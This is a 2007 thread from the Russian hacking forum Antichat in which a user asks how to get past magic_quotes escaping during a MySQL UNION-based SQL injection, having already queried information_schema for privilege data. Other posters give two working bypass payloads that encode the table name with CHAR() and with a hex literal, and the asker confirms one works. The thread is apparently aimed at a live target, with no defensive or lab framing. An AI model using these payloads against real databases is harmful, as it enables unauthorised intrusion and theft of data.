Форум АНТИЧАТ - Обход кавычки в mysql-inj?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Обход кавычки в mysql-inj? (https://forum.antichat.xyz/showthread.php?t=53966)

orcismylife

20.11.2007 03:56

Обход кавычки в mysql-inj?

Версия
5.0.22-log

Нужно обойти кавычку...

=====
При построении запроса:

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name='USER_PRIVILEGES'+limit+1,1/*

=====
Мускул выдает, что:

<...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

Мэджик квотес судя по всему включены... Обойти как-то можно?

ЗЫ. Пробовал перевести в хекс - не получилось.

Constantine

20.11.2007 03:59

Что значит не получилось в хекс перевести?

orcismylife

20.11.2007 04:11

переверсти в хекс получилось, результат запроса не изменился

+toxa+

20.11.2007 04:14

Надеюсь ты ковычки тоже в хекс не переводил...

Scipio

20.11.2007 04:18

вот тебе два варианта:
+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=CHAR(85,83,69,82,95,80,82,73,86,73 ,76,69,71,69,83)+limit+1,1/*

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=0x555345525F50524956494C45474553+l imit+1,1/*

orcismylife

20.11.2007 04:27

йа дибилко. забыл про char().. всем огромное спасибо.

Время: 01:23